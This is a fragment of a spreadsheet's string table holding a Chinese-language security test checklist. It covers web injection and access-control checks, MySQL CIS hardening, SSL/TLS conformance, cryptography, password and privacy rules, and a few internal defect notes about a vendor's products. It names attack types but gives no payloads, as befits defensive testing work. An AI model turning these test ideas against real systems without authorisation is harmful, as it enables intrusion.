    <t>服务器端不接受该请求，返回错误消息。</t>
  </si>
  <si>
    <t>'100 检查Cookie的Secure、HttpOnly安全属性</t>
  </si>
  <si>
    <t>设置了Secure、HttpOnly属性。</t>
  </si>
  <si>
    <t>'101 检查Cookie的Domain安全属性</t>
  </si>
  <si>
    <t>'102 检查Cookie的Path安全属性</t>
  </si>
  <si>
    <t>'103 检查Cookie的Expires安全属性</t>
  </si>
  <si>
    <t>'104 会话固定验证</t>
  </si>
  <si>
    <t>'106 检查是否存在代理或者缓存泄漏</t>
  </si>
  <si>
    <t>'107 POST请求转换为GET请求测试</t>
  </si>
  <si>
    <t>'108 检查URL中是否携带会话标识</t>
  </si>
  <si>
    <t>URL中没有携带会话标识。</t>
  </si>
  <si>
    <t>'109 跨站请求伪造验证</t>
  </si>
  <si>
    <t>'110 检查是否存储过多会话数据</t>
  </si>
  <si>
    <t>'111 检查URL是否存在跨目录下载</t>
  </si>
  <si>
    <t>跨目录下载文件不成功</t>
  </si>
  <si>
    <t>'112 检查POST请求参数是否存在跨目录下载</t>
  </si>
  <si>
    <t>'113 检查COOKIE是否存在跨目录下载</t>
  </si>
  <si>
    <t>'114 上传文件是否存在跨目录下载</t>
  </si>
  <si>
    <t>业界标准 CSEC</t>
  </si>
  <si>
    <t>'115 URL直接越权测试</t>
  </si>
  <si>
    <t>'116 基于URL的横向越权测试</t>
  </si>
  <si>
    <t>'117 URL越权直接进行文件下载测试</t>
  </si>
  <si>
    <t>'118 基于资源ID处理的横向越权操作测试</t>
  </si>
  <si>
    <t>'119 基于用户身份处理的横向越权操作测试</t>
  </si>
  <si>
    <t>'120 检查请求消息是否存在字段指示管理权限，并通过修改进行提权测试</t>
  </si>
  <si>
    <t>'123 基于action、dwr等其他形式的的纵向越权</t>
  </si>
  <si>
    <t>'124 绕过按键/页面元素限制的纵向越权</t>
  </si>
  <si>
    <t>执行不成功(请求被拒绝,系统提示用户无权限使用该业务)。</t>
  </si>
  <si>
    <t>'125 反射式跨站脚本测试</t>
  </si>
  <si>
    <t>'126 存储式跨站脚本测试</t>
  </si>
  <si>
    <t>'127 基于 DOM 的跨站脚本检测</t>
  </si>
  <si>
    <t>'128 通过特殊字符的输入检查是否存在SQL注入风险</t>
  </si>
  <si>
    <t>'129 通过构造SQL语句条件，查询数据库的数据信息，检查是否有sql注入</t>
  </si>
  <si>
    <t>构造的UNION查询语句无法查询相关数据</t>
  </si>
  <si>
    <t>'131 利用通配符拒绝服务攻击测试SQL注入</t>
  </si>
  <si>
    <t>存在有输入查询的地方</t>
  </si>
  <si>
    <t>如果应用程序有漏洞的话，那么响应时间会比平常久。</t>
  </si>
  <si>
    <t>业界标准 《白帽子讲web安全》</t>
  </si>
  <si>
    <t>无法成功登录系统</t>
  </si>
  <si>
    <t>系统未返回LDAP查询错误，或者系统日志中未出现LDAP语法错误信息。</t>
  </si>
  <si>
    <t>返回结果无XML语法错误，或检查系统XML处理日志，无XML请法错误信息。</t>
  </si>
  <si>
    <t>无法进行XSS注入</t>
  </si>
  <si>
    <t>web 服务器未出现异常现象如挂死等</t>
  </si>
  <si>
    <t>web 功能未出现异常</t>
  </si>
  <si>
    <t>系统未返回XPATH语法错误，或后台XPATH处理日志中无语法错误信息。</t>
  </si>
  <si>
    <t>不能登录系统，如可以登录系统说明系统存在XPATH注入风险。</t>
  </si>
  <si>
    <t>'142 使用SSI指令字符集进行SSI注入验证</t>
  </si>
  <si>
    <t>无法查看文件内容及目录内容，或者无错误语法信息，以错误语法日志记录</t>
  </si>
  <si>
    <t>未将查询结果返回给页面或以一个文件形式展示</t>
  </si>
  <si>
    <t>页面未返回hacked</t>
  </si>
  <si>
    <t>'147 在URL中进行OS指令注入</t>
  </si>
  <si>
    <t>'148 通过URL在PHP页面进行OS命令注入验证</t>
  </si>
  <si>
    <t>无法注入OS命令，界面未返回文件内容。</t>
  </si>
  <si>
    <t>优秀实践 红黑论坛</t>
  </si>
  <si>
    <t>'149 WEB查看文件文件时进行注入验证</t>
  </si>
  <si>
    <t>'150 WEB系统存在使用操作命令的功能，进行命令注入验证</t>
  </si>
  <si>
    <t>'151 缓冲区溢出检测</t>
  </si>
  <si>
    <t>产品使用C实现后台应用，可以获取到产品代码</t>
  </si>
  <si>
    <t>'152 释放资源失败溢出</t>
  </si>
  <si>
    <t>能够获取到源代码</t>
  </si>
  <si>
    <t>源代码不存在释放资源失败。</t>
  </si>
  <si>
    <t>服务器端对输入有做校验，防止过大数值或者字符串写入</t>
  </si>
  <si>
    <t>'156 超出系统限制的边界范围进行验证</t>
  </si>
  <si>
    <t>针对同一帐户操作后，帐户资源一致。</t>
  </si>
  <si>
    <t>'162 文件上传是否限制文件类型</t>
  </si>
  <si>
    <t>'163 文件上传是否在客户端判断文件类型</t>
  </si>
  <si>
    <t>'164 文件上传是否限制文件大小</t>
  </si>
  <si>
    <t>'165 文件上传是否对上传的文件自动重命名</t>
  </si>
  <si>
    <t>上传文件时文件自动重命名</t>
  </si>
  <si>
    <t>'166 个人敏感信息传输使用HTTPS</t>
  </si>
  <si>
    <t>'167 个人机密数据加密传输</t>
  </si>
  <si>
    <t>'168 用户登录时，使用带服务器端证书的 SSL</t>
  </si>
  <si>
    <t>'169 用户修改口令/密码时，使用带服务器端证书的 SSL</t>
  </si>
  <si>
    <t>对于Web应用，修改口令时，往服务器端传递用户名和口令时，采用HTTPS安全协议（也就是带服务器端证书的SSL）。</t>
  </si>
  <si>
    <t>'170 所有通过用户密码/口令方式解除锁定的地方，使用带服务器端证书的SSL</t>
  </si>
  <si>
    <t>对于Web应用，解除锁定，往服务器端传递用户名和口令时，采用HTTPS安全协议（也就是带服务器端证书的SSL）。</t>
  </si>
  <si>
    <t>'171 访问重要事务/敏感信息时，所有通过用户密码/口令的方式要求重新认证的地方，使用带服务器端证书的SSL</t>
  </si>
  <si>
    <t>'172 服务器返回过多的个人信息或机密信息给客户端</t>
  </si>
  <si>
    <t>系统未返回多余的敏感信息。</t>
  </si>
  <si>
    <t>'173 口令输入框不支持拷贝功能</t>
  </si>
  <si>
    <t>'1.Web业务运行正常</t>
  </si>
  <si>
    <t>'174 WEB服务器对异常请求的处理时，返回的错误信息不包含服务器相关数据。</t>
  </si>
  <si>
    <t>'175 WSDL中是否存在未发布的提供查询敏感信息接口</t>
  </si>
  <si>
    <t>WSDL中无未发布的提供查询敏感信息接口</t>
  </si>
  <si>
    <t>'176 对Web Service接口的调用必须进行认证</t>
  </si>
  <si>
    <t>存在用于认证的参数，能正常调用</t>
  </si>
  <si>
    <t>'177 对Web Service接口的调用必须进行鉴权</t>
  </si>
  <si>
    <t>无权限用户无法调用该接口</t>
  </si>
  <si>
    <t>'178 对Web Service提交的参数进行输入校验</t>
  </si>
  <si>
    <t>返回信息提示输入参数错误，或者返回表示输入参数错误的返回码。</t>
  </si>
  <si>
    <t>'179 通过Web Service接口使用加密通道传递敏感消息</t>
  </si>
  <si>
    <t>Web Service接口使用HTTPS传输敏感消息</t>
  </si>
  <si>
    <t>'180 使用SOAPUI构造不合法的XML至服务端，查看系统是否异常</t>
  </si>
  <si>
    <t>系统无异常</t>
  </si>
  <si>
    <t>'181 使用SOAPUI构造大量的负荷发送到服务端，查看系统是否异常</t>
  </si>
  <si>
    <t>'182 通过WEB SERVICE接口上传超大二进制附件</t>
  </si>
  <si>
    <t>'183 使用CODENOMIC对Web Service接口进行畸形报文测试</t>
  </si>
  <si>
    <t>'184 对Web Service接口进行SQL注入或XPath注入漏洞测试</t>
  </si>
  <si>
    <t>Web Service运行正常</t>
  </si>
  <si>
    <t>'185 XML命令注入验证</t>
  </si>
  <si>
    <t>无法命令注入，接口未反馈OS命令查询信息</t>
  </si>
  <si>
    <t>'186 自动检查Web Service接口是否存在SQL注入、XPATH注入、跨站脚本漏洞</t>
  </si>
  <si>
    <t>均不能返回正确的结果</t>
  </si>
  <si>
    <t>'187 对Web Service接口进行重放攻击</t>
  </si>
  <si>
    <t>目标应用运行正常</t>
  </si>
  <si>
    <t>不存在重放攻击漏洞</t>
  </si>
  <si>
    <t>'188 WEB服务器指纹测试</t>
  </si>
  <si>
    <t>'189 使用APPSCAN对WEB应用扫描测试</t>
  </si>
  <si>
    <t>'190 使用APPSCAN对WEB服务扫描测试</t>
  </si>
  <si>
    <t>经过分析确认以后的扫描结果中不存在信息提示以上等级的漏洞。</t>
  </si>
  <si>
    <t>'191 Web服务安全测试WSDigger扫描</t>
  </si>
  <si>
    <t>'192 使用AWVS对web服务扫描测试</t>
  </si>
  <si>
    <t>已知漏洞 BSS</t>
  </si>
  <si>
    <t>'193 flash跨域配置</t>
  </si>
  <si>
    <t>'194 检查是否存在不安全的URL重定向</t>
  </si>
  <si>
    <t>'195 对DWR提交的参数进行输入校验</t>
  </si>
  <si>
    <t>所有非法输入都被校验系统过滤给出错误提示并记录日志。</t>
  </si>
  <si>
    <t>'196 上传文件过程中，关闭上传页面，系统出现异常</t>
  </si>
  <si>
    <t>系统正常运行</t>
  </si>
  <si>
    <t>'197 对象标识符识别安全</t>
  </si>
  <si>
    <t>系统web业务运行正常</t>
  </si>
  <si>
    <t>'001 提供网络拓扑图</t>
  </si>
  <si>
    <t>'1.产品提供网络拓扑图</t>
  </si>
  <si>
    <t>'002 安全域划分</t>
  </si>
  <si>
    <t>'1.产品提供组网图</t>
  </si>
  <si>
    <t>'003 核心业务区主机部署</t>
  </si>
  <si>
    <t>'1.产品提供组网文档</t>
  </si>
  <si>
    <t>'004 系统支持对管理平面的接口的访问保护</t>
  </si>
  <si>
    <t>'005 安全域边界控制</t>
  </si>
  <si>
    <t>'006 安全特性描述</t>
  </si>
  <si>
    <t>'1.产品提供安全特性描述文档</t>
  </si>
  <si>
    <t>'007 安全技术白皮书</t>
  </si>
  <si>
    <t>'1.产品提供安全技术白皮书</t>
  </si>
  <si>
    <t>'008 安全配置/加固指南</t>
  </si>
  <si>
    <t>'1.产品提供安全配置/加固指南</t>
  </si>
  <si>
    <t>'009 防病毒软件部署指南</t>
  </si>
  <si>
    <t>'1.产品提供防病毒软件部属指南</t>
  </si>
  <si>
    <t>检查产品配套文档是否包含防病毒软件部署指南</t>
  </si>
  <si>
    <t>'010 安全维护</t>
  </si>
  <si>
    <t>'1.产品提供安全维护手册</t>
  </si>
  <si>
    <t>检查产品配套文档是否包含《安全维护手册》</t>
  </si>
  <si>
    <t>'011 源码安全工具检查</t>
  </si>
  <si>
    <t>'1.产品提供完整源码包</t>
  </si>
  <si>
    <t>'1、扫描报告中不存在中级别以上问题，低级别问题已有安全组结论</t>
  </si>
  <si>
    <t>'001 SecureCAT工具扫描</t>
  </si>
  <si>
    <t>目标mysql服务正常运行</t>
  </si>
  <si>
    <t>启动SecureCAT，选择mysql对应的benchmark，输入mysql连接用户名/密码，查看扫描结果分数是否低于65分，对于扣分项，产品是否提供了相应的分析说明。</t>
  </si>
  <si>
    <t>红线要求 红线 6.1.3 使用安全扫描软件扫描，不存在“高”级别的漏洞。</t>
  </si>
  <si>
    <t>'002 Nessus或NGSAuditor安全工具扫描</t>
  </si>
  <si>
    <t>选择合适的扫描策略，使用Nessus或NGS　Auditor对目标mysql服务进行扫描，查看是否存在安全漏洞。</t>
  </si>
  <si>
    <t>无高风险级别漏洞，中低风险级别当前版本确实无法解决的，已给出分析结论并明确后续解决版本</t>
  </si>
  <si>
    <t>'003 mysql运行账号检查</t>
  </si>
  <si>
    <t>运行MySQL服务的为非管理员账号</t>
  </si>
  <si>
    <t>红线要求：使用单独的操作系统的非管理员权限帐号来运行数据库 业界标准 CIS benchmark</t>
  </si>
  <si>
    <t>'004 检查mysql是否安装在系统分区</t>
  </si>
  <si>
    <t>目标mysql服务正常运行，SecureCAT扫描结果对应该条用例执行失败</t>
  </si>
  <si>
    <t>mysql未安装在系统分区</t>
  </si>
  <si>
    <t>数据库若安装在系统分区，操作系统中磁盘可用空间耗尽可能造成拒绝服务 业界标准 CIS benchmark</t>
  </si>
  <si>
    <t>'005 检查MYSQL PWD环境变量是否被使用</t>
  </si>
  <si>
    <t>环境变量 MYSQL_PWD 没有定义</t>
  </si>
  <si>
    <t>环境变量MYSQL_PWD明文存储着MySQL口令，而一般的操作系统用户都可以访问系统环境变量 业界标准 CIS benchmark</t>
  </si>
  <si>
    <t>'006 检查mysql版本</t>
  </si>
  <si>
    <t>mysql版本高于5.0</t>
  </si>
  <si>
    <t>低版本的mysql可能存在业界一些已知的公开漏洞，攻击者通过这些漏洞对数据库发起攻击 业界标准 CIS benchmark</t>
  </si>
  <si>
    <t>'007 用户密码复杂度检查</t>
  </si>
  <si>
    <t>已有用户密码复杂度符合红线要求，新增用户时无法新增弱密码复杂度的用户</t>
  </si>
  <si>
    <t>红线要求 业界标准 CIS benchmark</t>
  </si>
  <si>
    <t>'008 检查是否存在空密码</t>
  </si>
  <si>
    <t>不存在空用户密码</t>
  </si>
  <si>
    <t>'009 检查能访问系统数据库mysql的用户</t>
  </si>
  <si>
    <t>查询结果应该为数据库管理员或者为空</t>
  </si>
  <si>
    <t>红线要求，所有数据库帐户只能具备执行其任务的最小权限，mysql数据库中包含数据库一些重要敏感信息，如用户名密码，应该严格控制访问权限 优秀实践 CIS benchmark</t>
  </si>
  <si>
    <t>'010 检查具有FILE权限的用户</t>
  </si>
  <si>
    <t>查询结果为管理员用户</t>
  </si>
  <si>
    <t>FILE权限允许MySQL用户将文件写入磁盘，影响数据机密性 业界标准 CIS benchmark</t>
  </si>
  <si>
    <t>'011 检查具有PROCESS权限的用户</t>
  </si>
  <si>
    <t>PROCESS权限允许管理员查看当前运行的MySQL语句，包括用来管理密码的语句，这样的权限可能会被攻击者获取来危害MySQL数据库 业界标准 CIS benchmark</t>
  </si>
  <si>
    <t>'012 检查具有SUPER权限的用户</t>
  </si>
  <si>
    <t>SUPER权限允许管理员查看和终止当前运行的MySQL语句，包括用来管理密码的语句。 该权限允许管理员配置MySQL数据库。 这样的权限可能会被攻击者获取来危害MySQL数据库 业界标准 CIS benchmark</t>
  </si>
  <si>
    <t>'013 检查具有SHUTDOWN权限的用户</t>
  </si>
  <si>
    <t>SHUTDOWN权限允许管理员关闭MySQL数据库。 这项权限可能会被攻击者获取来破坏MySQL数据库的可靠性 业界标准 CIS benchmark</t>
  </si>
  <si>
    <t>'014 检查具有CREATE USER权限的用户</t>
  </si>
  <si>
    <t>CREATE USER权限允许管理员创建MySQL用户。 这样的权限可能会被攻击者获取来危害MySQL数据库 业界标准 CIS benchmark</t>
  </si>
  <si>
    <t>'015 检查具有RELOAD权限的用户</t>
  </si>
  <si>
    <t>RELOAD权限允许管理员重新加载权限。 非管理员不能修改权限，所以不需要这项权限 业界标准 CIS benchmark</t>
  </si>
  <si>
    <t>'016 检查具有GRANT权限的用户</t>
  </si>
  <si>
    <t>GRANT权限允许管理员为其他管理员授予额外权限。 这样的权限可能会被攻击者获取来危害MySQL数据库 业界标准 CIS benchmark</t>
  </si>
  <si>
    <t>'017 查看mysql监听平面</t>
  </si>
  <si>
    <t>'1.mysql只可以被业务需要的ip访问，不可以在windows远程访问</t>
  </si>
  <si>
    <t>'018 配置文件中log-update选项检查</t>
  </si>
  <si>
    <t>mysql服务正常运行</t>
  </si>
  <si>
    <t>配置文件中禁用--log-update选项</t>
  </si>
  <si>
    <t>升级日志目前已经弃用，可使用二进制日志来代替。 升级日志传输不安全。 避免–-log- update选项可增强MySQL日志文件的完整性和可靠性 业界标准 CIS benchmark</t>
  </si>
  <si>
    <t>'019 检查mysql是否使用了最新的安全补丁</t>
  </si>
  <si>
    <t>mysql使用了最新的安全补丁</t>
  </si>
  <si>
    <t>低版本存在的漏洞或缺陷需要补丁来进行加固，保持MySQL补丁的实时性可以保证MySQL中数据的保密性，完整性，和可靠性 业界标准 CIS benchmark</t>
  </si>
  <si>
    <t>'020 检查每一个数据库账号是否只用于一个应用</t>
  </si>
  <si>
    <t>每一个数据库账号对应唯一应用</t>
  </si>
  <si>
    <t>一个账号只用于一个应用，可以减少由于被盗MySQL账号造成的影响 业界标准 CIS benchmark</t>
  </si>
  <si>
    <t>'021 SSL证书/密钥检查</t>
  </si>
  <si>
    <t>mysql服务正常运行，配置了SSL安全连接</t>
  </si>
  <si>
    <t>mysql使用单独的证书</t>
  </si>
  <si>
    <t>使用缺省证书可能导致攻击者模拟MySQL服务器 业界标准 CIS benchmark</t>
  </si>
  <si>
    <t>'022 Nessus安全工具扫描</t>
  </si>
  <si>
    <t>目标操作系统服务正常运行</t>
  </si>
  <si>
    <t>'001 操作员帐号唯一性</t>
  </si>
  <si>
    <t>目标产品正常运行</t>
  </si>
  <si>
    <t>创建不成功，系统提示“XX帐号已存在”</t>
  </si>
  <si>
    <t>'002 最终用户帐号唯一性</t>
  </si>
  <si>
    <t>访问创建最终用户帐号的界面，创建一个已经存在的最终用户帐号。</t>
  </si>
  <si>
    <t>'003 程序帐号唯一性</t>
  </si>
  <si>
    <t>'004 帐号不能写死在代码中</t>
  </si>
  <si>
    <t>'005 操作员口令长度</t>
  </si>
  <si>
    <t>不能设置长度低于8个字符的新口令，并给出提示。</t>
  </si>
  <si>
    <t>'006 最终用户口令长度</t>
  </si>
  <si>
    <t>'007 程序帐号口令长度</t>
  </si>
  <si>
    <t>'008 操作员口令包含的字符</t>
  </si>
  <si>
    <t>口令设置不成功，并给出提示。</t>
  </si>
  <si>
    <t>'009 最终用户口令包含的字符</t>
  </si>
  <si>
    <t>'010 程序帐号口令包含的字符</t>
  </si>
  <si>
    <t>'011 操作员修改自己的口令需验证旧口令</t>
  </si>
  <si>
    <t>系统要求输入旧口令，并验证旧口令正确，才允许修改口令。</t>
  </si>
  <si>
    <t>'012 最终用户修改自己的口令需验证旧口令</t>
  </si>
  <si>
    <t>'1、以最终用户帐号登录，访问修改口令的界面，为当前登录用户设置新口令，系统是否要求输入旧口令，并验证旧口令是否正确。</t>
  </si>
  <si>
    <t>'013 程序帐号修改口令需提供旧口令</t>
  </si>
  <si>
    <t>'014 通过认证才可以修改口令</t>
  </si>
  <si>
    <t>'015 更改口令必须确认口令有效性</t>
  </si>
  <si>
    <t>更改口令时，口令和确认口令输入相同时才可以修改成功</t>
  </si>
  <si>
    <t>'016 系统自身操作维护类的口令，输入口令时口令不能明文回显</t>
  </si>
  <si>
    <t>'017 源码中不包括明文口令</t>
  </si>
  <si>
    <t>'018 口令输入框不支持拷贝功能</t>
  </si>
  <si>
    <t>人机接口：无法复制口令输入框中的字符串</t>
  </si>
  <si>
    <t>'019 口令在本地存储时必须加密</t>
  </si>
  <si>
    <t>'020 口令与用户名关联加密</t>
  </si>
  <si>
    <t>'021 在不需要还原口令的场景，必须使用不可逆算法加密。</t>
  </si>
  <si>
    <t>'022 口令安全存储</t>
  </si>
  <si>
    <t>'023 口令不能在网络中明文传输</t>
  </si>
  <si>
    <t>'024 提供账号口令清单</t>
  </si>
  <si>
    <t>'025 从服务器端的会话信息中获取修改口令的操作员帐号</t>
  </si>
  <si>
    <t>'026 从服务器端的会话信息中获取修改口令的最终用户帐号</t>
  </si>
  <si>
    <t>'027 口令不能和用户名相同</t>
  </si>
  <si>
    <t>'028 应用内置账号口令要求</t>
  </si>
  <si>
    <t>所有应用内置帐号的缺省口令均符合密码复杂度基本要求，并在客户资料中强调修改初始密码。</t>
  </si>
  <si>
    <t>'1.被测试设备正常</t>
  </si>
  <si>
    <t>红线 B 3.1.3</t>
  </si>
  <si>
    <t>被测试设备正常工作</t>
  </si>
  <si>
    <t>'1、使用16384位的超长证书发起连接</t>
  </si>
  <si>
    <t>'1、连接失败，且不会导致被测设备出现异常</t>
  </si>
  <si>
    <t>'1、设备CPU占用率上升在可接受水平，不影响新增的合法SSL连接请求的接入</t>
  </si>
  <si>
    <t>'1、连接失败</t>
  </si>
  <si>
    <t>'001 当前时间超过证书正常使用时间后，上报证书不可用告警</t>
  </si>
  <si>
    <t>'1、连接网元失败</t>
  </si>
  <si>
    <t>红线 A2 8.1.3</t>
  </si>
  <si>
    <t>'003 SSL证书是否为自验证签名</t>
  </si>
  <si>
    <t>'1、存在可用证书</t>
  </si>
  <si>
    <t>'005 默认使用ssl/TLS传输数据</t>
  </si>
  <si>
    <t>'006 SSL双向认证</t>
  </si>
  <si>
    <t>'1.ssl服务开启</t>
  </si>
  <si>
    <t>optional 已知漏洞</t>
  </si>
  <si>
    <t>'007 HMAC中PRF字段安全</t>
  </si>
  <si>
    <t>'1、获取到被测对象的源码</t>
  </si>
  <si>
    <t>'008 记录层协议长度控制</t>
  </si>
  <si>
    <t>'1.若没有限制则存在问题，不满足协议规定，可以尝试越界攻击；</t>
  </si>
  <si>
    <t>'009 压缩长度限制</t>
  </si>
  <si>
    <t>'1、长度限制在2^14+1024=17408字节内（可以包含17408）。</t>
  </si>
  <si>
    <t>'012 record overflow告警消息满足RFC</t>
  </si>
  <si>
    <t>'013 不能协商出一套可行的安全参数，产生handshake failure告警</t>
  </si>
  <si>
    <t>'014 证书超期，产生certificate expired告警</t>
  </si>
  <si>
    <t>'1、若没有收到表示没有按照RFC实现来完成。</t>
  </si>
  <si>
    <t>'015 握手协议报文顺序正确</t>
  </si>
  <si>
    <t>'1、若不一致则证明没有遵从RFC</t>
  </si>
  <si>
    <t>'016 握手协议按照顺序错误</t>
  </si>
  <si>
    <t>should 业界标准</t>
  </si>
  <si>
    <t>'017 hello request消息响应告警</t>
  </si>
  <si>
    <t>'018 client hello消息中sessid和cipher suites消息不能均为空</t>
  </si>
  <si>
    <t>'1、TLS协商不能完成</t>
  </si>
  <si>
    <t>'019 hello message消息的请求和响应的一致性</t>
  </si>
  <si>
    <t>'1、服务器端产生致命告警并关闭连接</t>
  </si>
  <si>
    <t>'020 对多条SSL连接处理正确性</t>
  </si>
  <si>
    <t>'1、同时发起多个SSL连接</t>
  </si>
  <si>
    <t>'1、连接正确建立</t>
  </si>
  <si>
    <t>'021 SSL最大连接数情况下，查看CPU、内存占用情况</t>
  </si>
  <si>
    <t>'1、CPU占用率、内存占用率没有异常升高情况，系统日志中没有异常信息</t>
  </si>
  <si>
    <t>'022 长时间反复建立、断开SSL链路，系统正常</t>
  </si>
  <si>
    <t>'1、连接建立正常，CPU占用率、内存占用率没有异常升高情况，系统日志中没有异常信息</t>
  </si>
  <si>
    <t>'023 ssl服务器证书删除测试</t>
  </si>
  <si>
    <t>'024 使用安全的ssl版本</t>
  </si>
  <si>
    <t>'025 SSL客户端默认应该对服务端进行验证</t>
  </si>
  <si>
    <t>被测试设备为客户端且正常工作</t>
  </si>
  <si>
    <t>'1、客户端默认需要对服务端进行验证，且修改为不认证服务端的时候需要提示风险。</t>
  </si>
  <si>
    <t>'026 被测设备支持更新默认证书为自定义证书</t>
  </si>
  <si>
    <t>'027 证书合法性校验</t>
  </si>
  <si>
    <t>被测试设备作为服务端采用双向认证模式，或作为客户端</t>
  </si>
  <si>
    <t>'1、使用被测设备不匹配的证书连接被测设备</t>
  </si>
  <si>
    <t>'028 吊销机制验证</t>
  </si>
  <si>
    <t>被测试设备证书支持吊销</t>
  </si>
  <si>
    <t>'1、使用已被吊销的证书连接被测设备</t>
  </si>
  <si>
    <t>'001 使用RSA算法进行加密操作时，应优先选择OAEP填充方式</t>
  </si>
  <si>
    <t>'1.产品提供源码包</t>
  </si>
  <si>
    <t>'2.RSA使用OAEP有填充方式</t>
  </si>
  <si>
    <t>RSA_PKCS1_OAEP_PADDING</t>
  </si>
  <si>
    <t>'002 AES_CBC_HEX_FILE模块使用随机生成密钥和随机IV的AES_CBC加密模式</t>
  </si>
  <si>
    <t>'1.查看加密的密钥和向量是否是随机生成的</t>
  </si>
  <si>
    <t>'003 AES_CBC_HEX_Util_OLD_ONE模块使用随机生成密钥和安全随机算法</t>
  </si>
  <si>
    <t>'1.查看AES_CBC_HEX_Util_OLD_ONE模块是否使用随机生成密钥和jvm的安全随机算法</t>
  </si>
  <si>
    <t>'1.加密使用随机生成密钥和安全随机算法java.security.SecureRandom()</t>
  </si>
  <si>
    <t>'004 用户的个人数据要保存到应用程序目录</t>
  </si>
  <si>
    <t>'005 头像本地加载模块对头像文件的大小和有效性进行判断</t>
  </si>
  <si>
    <t>'1.使用文件比较大的图片(2M)替换原有的图片，查看系统是否正常运行</t>
  </si>
  <si>
    <t>'1.图片过大会直接压缩。不会导致程序产生OutOfMemoryError</t>
  </si>
  <si>
    <t>'006 DetailActivity对序列化intent数据适当的处理</t>
  </si>
  <si>
    <t>'1.当对外部序列化数据进行了try-cash保护，检查异常情况是否调用super.Oncreate()</t>
  </si>
  <si>
    <t>'1.当对外部序列化数据进行了try-cash保护，调用super.Oncreate()</t>
  </si>
  <si>
    <t>'001 系统须提供检测口令复杂度的功能，若设置的口令不符合复杂度要求，必须禁止设置成功并给出合理的提示。对于系统自动生成的口令，须使用安全随机数生成</t>
  </si>
  <si>
    <t>Level 3</t>
  </si>
  <si>
    <t>'002 系统存储口令时须加密。对口令进行单向哈希时，必须使用基于口令的密钥导出算法</t>
  </si>
  <si>
    <t>'003 在用户修改口令前，系统须提供验证旧口令以及对新口令再次确认的功能</t>
  </si>
  <si>
    <t>'004 系统禁止明文显示口令</t>
  </si>
  <si>
    <t>'005 系统禁止口令输入框拷出的功能</t>
  </si>
  <si>
    <t>问题1（致命）：系统提供的口令输入框支持口令的Ctrl+C操作。</t>
  </si>
  <si>
    <t>'1、口令框内的信息禁止被拷出或剪切到其他位置（如：文本文件，网络设备等）</t>
  </si>
  <si>
    <t>'001 对于人机接口或跨信任网络的机机接口的登录认证必须支持口令防暴力破解机制，当重复输入错误口令次数(如3次）超过阈值时采取合适保护措施</t>
  </si>
  <si>
    <t>'001 认证失败后，登录界面以及认证服务端返回信息均不能提供详细的、可用于判断具体错误原因的提示</t>
  </si>
  <si>
    <t>'001 包含敏感信息的文件（包括程序运行时产生的静态文件和临时文件）必须要有权限控制，只能被相应权限的用户访问</t>
  </si>
  <si>
    <t>目标系统运行正常</t>
  </si>
  <si>
    <t>'002 对于终端类产品，其应用程序应该只申请业务功能所必须的最小权限，以免权限滥用而存在安全风险</t>
  </si>
  <si>
    <t>'001 禁止使用私有的、非标准的密码算法</t>
  </si>
  <si>
    <t>'002 禁止使用不安全的密码算法，推荐使用强加密算法</t>
  </si>
  <si>
    <t>产品新版本中是否缺省使用推荐的强密码算法。</t>
  </si>
  <si>
    <t>'001 密码算法中使用到的随机数必须是密码学意义上的安全随机数</t>
  </si>
  <si>
    <t>'002 分组密码算法使用到的IV值，必须不可预测。对称密码算法中在使用同一密钥时，不应当两次使用同一个IV加密数据</t>
  </si>
  <si>
    <t>'003 使用非对称运算保护数据机密性时，禁止使用私钥加密数据</t>
  </si>
  <si>
    <t>问题1（一般）：sec.huawei.com向USG6600发送升级特征库服务器和特征升级包的MD5值时,采用私钥加密.恶意人员可用公钥进行解密,进而对特征库升级包进行拦截和篡改攻击,导致AV等功能不正常。参看DTS2014100802200</t>
  </si>
  <si>
    <t>'1、是否使用私钥加密敏感数据</t>
  </si>
  <si>
    <t>'1、禁止使用私钥加密敏感数据</t>
  </si>
  <si>
    <t>'004 DH密钥协商过程中，双方需对对方临时公钥值进行验证，以保证临时公钥值不能为某些特殊值，防止简单替换攻击</t>
  </si>
  <si>
    <t>'1、使用DH算法进行密钥协商的双方在接收到对方发送过来的“公钥”时，应判断公钥的值</t>
  </si>
  <si>
    <t>'1、使用DH算法进行密钥协商的双方在接收到对方发送过来的“公钥”时，应判断公钥是不是0,1,p-1,p这样的特殊值并要求重新发起密钥协商</t>
  </si>
  <si>
    <t>'001 密钥须支持可更新，在一次性可编程的芯片中保存的密钥除外。用于业务数据加解密的工作密钥不可硬编码在代码中，根密钥建议仅对部分密钥组件进行硬编码</t>
  </si>
  <si>
    <t>'002 密钥等敏感数据在本地存储时均需提供机密性保护</t>
  </si>
  <si>
    <t>'003 产品须支持按标准格式(如PKCS系列标准)对证书私钥进行保存和加密。使用基于口令的加密机制（如PBES2）时，口令应符合口令复杂度要求，并在设备上加密存储；（开源软件的口令可不用加密存储）</t>
  </si>
  <si>
    <t>'001 对于数据控制者，收集个人数据必须要获得数据主体的授权</t>
  </si>
  <si>
    <t>'002 个人数据收集范围、使用目的不得超出隐私声明</t>
  </si>
  <si>
    <t>'001 产品须对本地存储的个人数据提供适当的安全保护机制，如认证、授权、加密、日志等</t>
  </si>
  <si>
    <t>'002 最终用户发起的数据删除命令必须在后台数据库彻底物理删除，而非物理删除</t>
  </si>
  <si>
    <t>亲情关怀业务，最终用户在apk上删除亲友团信息时，后台数据库并没有屋里删除，而只是做了逻辑上的删除，后台数据依然保留。</t>
  </si>
  <si>
    <t>'001 对于数据控制者和处理者，必须提供机制或指导来删除或匿名化超过存留期的个人数据</t>
  </si>
  <si>
    <t>'001 使用来源可信的私钥对软件进行签名</t>
  </si>
  <si>
    <t>'002 必须严格保护用于软件完整性保护的根证书</t>
  </si>
  <si>
    <t>问题1（一般）：1）下载安装文件在本地并且解压安装文件；2）查看安装文件的根证书和本地证书；3）安全威胁所在：恶意用户伪造根证书和本地证书，及软件包。上传恶意软件。建议解决方案：根证书和本地证书不同时存放。建议使用WIN7的做法，根证书使用出厂预置。本地证书存放在安装包中。</t>
  </si>
  <si>
    <t>'1、是否将根证书以证书文件的形式随发布包一起发布</t>
  </si>
  <si>
    <t>'003 在非信任网络之间进行敏感数据（包括口令，对称密钥，共享秘密，银行帐号，批量个人数据等）的传输须采用安全传输通道或者加密后传输，有标准协议规定除外</t>
  </si>
  <si>
    <t>'004 口令、密钥等敏感信息不允许明文存储在本地，应该加密保护；对敏感数据的访问要有认证、授权或加密机制。</t>
  </si>
  <si>
    <t>'005 禁止在URL、日志、错误消息、调试信息中暴露口令、密钥、银行账号、会话标识符等敏感信息</t>
  </si>
  <si>
